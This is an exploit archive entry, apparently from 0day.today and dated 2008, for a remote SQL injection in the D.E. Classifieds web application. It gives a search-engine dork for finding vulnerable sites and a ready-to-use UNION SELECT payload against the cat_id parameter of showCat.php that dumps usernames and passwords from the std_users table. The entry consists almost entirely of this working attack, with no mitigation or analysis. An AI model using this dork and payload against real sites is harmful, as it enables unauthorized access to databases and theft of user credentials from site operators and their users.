id: 2762
date: 03/21/2008
title: D.E. Classifieds (cat_id) Remote SQL Injection Vulnerability
author: S@BUN
cves: 

============================================================
D.E. Classifieds (cat_id) Remote SQL Injection Vulnerability
============================================================



##########################################
#
# DE Classifieds(cat_id) SQL injection
#
###########################################
#
# DORK 1 : allinurl: "showCat.php?cat_id"
#

###########################################
EXPLOIT :

showCat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*

###########################################



#  0day.today [2023-03-25]  #